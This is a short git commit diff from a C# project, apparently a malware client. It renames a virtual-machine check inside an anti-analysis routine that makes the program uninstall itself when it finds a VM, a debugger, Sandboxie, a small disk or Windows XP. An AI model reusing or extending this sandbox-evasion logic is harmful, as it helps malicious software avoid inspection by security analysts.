Update Anti_Analysis.cs

This commit is contained in:
NYAN CAT 2019-06-17 18:59:23 +03:00
parent b84405245c
commit 3ba7176cef

View File

@ -23,7 +23,7 @@ namespace Client.Helper
{ {
public static void RunAntiAnalysis() public static void RunAntiAnalysis()
{ {
if (DetectVirtualMachine() || DetectDebugger() || DetectSandboxie() || IsSmallDisk() || IsXP()) if (DetectManufacturer() || DetectDebugger() || DetectSandboxie() || IsSmallDisk() || IsXP())
//Environment.FailFast(null); //Environment.FailFast(null);
new HandleUninstall(); new HandleUninstall();
} }
@ -49,7 +49,7 @@ namespace Client.Helper
return false; return false;
} }
private static bool DetectVirtualMachine() private static bool DetectManufacturer()
{ {
try try
{ {